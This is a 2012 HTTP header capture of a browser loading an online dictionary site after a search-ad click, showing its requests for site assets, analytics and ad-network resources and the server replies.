Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Set-Cookie: Apache=195.159.140.222.1352402956273863; path=/
Last-Modified: Tue, 16 Aug 2011 15:56:10 GMT
Etag: &quot;4288b3-a53-4aaa16b177a80&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 969
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /static//js/common.js HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 19:29:15 GMT
Server: Apache
Last-Modified: Tue, 04 Sep 2012 11:50:39 GMT
Etag: &quot;2ff00-63a-ddf5a1c0&quot;
Accept-Ranges: bytes
Content-Length: 1594
Connection: close
GET /static//css/thickbox.css HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 19:29:15 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2feb8-fb3-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 4019
Connection: close
GET /?utm_source=cb&utm_medium=cb&utm_campaign=cb2 HTTP/1.1

Host: worddictionary.co.uk
GET /?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://clicks.affectsearch.com/fly?q=Security+Cameras&amp;enk=JrGGuSa5j6GPiY+pRrHGoY+JZqlGoQaRJ6lG4ybjRg==
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Thu, 08 Nov 2012 19:29:14 GMT
Server: Apache
Set-Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
Connection: close
Transfer-Encoding: chunked
GET /static//js/thickbox-compressed.js HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 19:29:15 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 09:33:26 GMT
Etag: &quot;2ff09-1778-7cfda580&quot;
Accept-Ranges: bytes
Content-Length: 6008
Connection: close
GET /static//css/stylesheet.css HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 19:29:15 GMT
Server: Apache
Last-Modified: Tue, 04 Sep 2012 11:50:39 GMT
Etag: &quot;2feb6-30fd-ddf5a1c0&quot;
Accept-Ranges: bytes
Content-Length: 12541
Connection: close
GET /static//js/jquery.min.js HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 19:29:15 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:42 GMT
Etag: &quot;2ff05-dfa6-dbb5780&quot;
Accept-Ranges: bytes
Content-Length: 57254
Connection: close
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Thu, 08 Nov 2012 08:35:33 GMT
Expires: Thu, 08 Nov 2012 20:35:33 GMT
Vary: Accept-Encoding
Age: 39223
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /static/images/ad_header_bg.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//css/stylesheet.css
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Tue, 04 Sep 2012 11:50:39 GMT
Etag: &quot;2febe-13b-ddf5a1c0&quot;
Accept-Ranges: bytes
Content-Length: 315
Connection: close
GET /static//inpage-affinity/knw79.html HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Mon, 10 Sep 2012 11:04:15 GMT
Etag: &quot;37adc-1f6-eb1169c0&quot;
Accept-Ranges: bytes
Content-Length: 502
Connection: close
GET /static//imgcache/article-20121108.jpg HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Thu, 08 Nov 2012 08:00:00 GMT
Etag: &quot;2ff33-82d-38c6a000&quot;
Accept-Ranges: bytes
Content-Length: 2093
Connection: close
GET /static//images/beta.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2fec9-9c-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 156
Connection: close
GET /static//birth-images/birth-11-8.jpg HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:42 GMT
Etag: &quot;2fdab-f17-dbb5780&quot;
Accept-Ranges: bytes
Content-Length: 3863
Connection: close
GET /static//images/logo.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2fee6-1d33-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 7475
Connection: close
GET /init/i.js?pubid=pqi80&aduid=150&phR=91895604245&u=http://worddictionary.co.uk/?utm_source=cb&utm_medium=cb&utm_campaign=cb2 HTTP/1.1

Host: tbn.ph.affinity.com
GET /init/i.js?pubid=pqi80&amp;aduid=150&amp;phR=91895604245&amp;u=http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: text/javascript; charset: UTF-8
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
P3P: CP=&quot;NOI ADM DEV COM NAV OUR STP&quot;
Expires: Mon, 01 jan 2012 05:00:00 GMT
Last-Modified: Thu, 08 Nov 2012 19:29:16 GMT
Cache-Control: pre-check=0, post-check=0, max-age=0
Pragma: no-cache
Set-Cookie: PHUU=803093fc02080839d9057141d44daea6; expires=Wed, 16-Nov-2022 19:29:16 GMT; path=/; domain=.ph.affinity.com phcpf=1; expires=Fri, 09-Nov-2012 19:29:16 GMT phjeb2=509C01306E651A59D48D8D35E0024347; expires=Sat, 08-Nov-2014 19:29:16 GMT
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1525912498&utmhn=worddictionary.co.uk&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=English%20Dictionary%20-%20WordDictionary.co.uk&utmhid=412554233&utmr=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&utmp=%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&utmac=UA-19392486-1&utmcc=__utma%3D37969189.1263011376.1352402957.1352402957.1352402957.1%3B%2B__utmz%3D37969189.1352402957.1.1.utmcsr%3Dcb%7Cutmccn%3Dcb2%7Cutmcmd%3Dcb%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=1525912498&amp;utmhn=worddictionary.co.uk&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=English%20Dictionary%20-%20WordDictionary.co.uk&amp;utmhid=412554233&amp;utmr=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&amp;utmp=%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&amp;utmac=UA-19392486-1&amp;utmcc=__utma%3D37969189.1263011376.1352402957.1352402957.1352402957.1%3B%2B__utmz%3D37969189.1352402957.1.1.utmcsr%3Dcb%7Cutmccn%3Dcb2%7Cutmcmd%3Dcb%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 20:35:32 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 82424
Server: GFE/2.0
GET /static//inpage-affinity/zsa52.html HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Mon, 10 Sep 2012 11:04:15 GMT
Etag: &quot;37ade-1f6-eb1169c0&quot;
Accept-Ranges: bytes
Content-Length: 502
Connection: close
GET /static//css/ico_rss.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//css/stylesheet.css
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2feb3-247-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 583
Connection: close
GET /static//inpage-affinity/djs28.html HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Mon, 10 Sep 2012 11:04:15 GMT
Etag: &quot;37adb-1f1-eb1169c0&quot;
Accept-Ranges: bytes
Content-Length: 497
Connection: close
GET /static//inpage-affinity/xxz97.html HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Mon, 10 Sep 2012 11:04:15 GMT
Etag: &quot;37add-1f1-eb1169c0&quot;
Accept-Ranges: bytes
Content-Length: 497
Connection: close
GET /static//css/headerImg.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//css/stylesheet.css
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2feb0-203-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 515
Connection: close
GET /ttj?id=931097 HTTP/1.1

Host: adpx.metanetwork.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=931097
Date: Thu, 08 Nov 2012 19:29:16 GMT
Content-Length: 0
GET /static//css/ico-socialmedia.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//css/stylesheet.css
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:16 GMT
Server: Apache
Last-Modified: Tue, 04 Sep 2012 11:50:39 GMT
Etag: &quot;2feb2-93c-ddf5a1c0&quot;
Accept-Ranges: bytes
Content-Length: 2364
Connection: close
GET /tb-v1-log.png?pk=pqi80&pi=238&aui=150&u=http%3A%2F%2Fworddictionary.co.uk%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&h=worddictionary.co.uk&pri=3&ru=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&ari=r3%3A222ffno28509c080c45ad83.35548412&tn=fluid-gray&am=banner&dim=728x90&pli=2462296&s=worddictionary.co.uk&t=RP HTTP/1.1

Host: tbn.ph.affinity.com
GET /tb-v1-log.png?pk=pqi80&amp;pi=238&amp;aui=150&amp;u=http%3A%2F%2Fworddictionary.co.uk%2F%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2&amp;h=worddictionary.co.uk&amp;pri=3&amp;ru=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D&amp;ari=r3%3A222ffno28509c080c45ad83.35548412&amp;tn=fluid-gray&amp;am=banner&amp;dim=728x90&amp;pli=2462296&amp;s=worddictionary.co.uk&amp;t=RP HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
P3P: CP=&quot;NOI ADM DEV COM NAV OUR STP&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 01 jan 2012 05:00:00 GMT
GET /ttj?id=931097 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
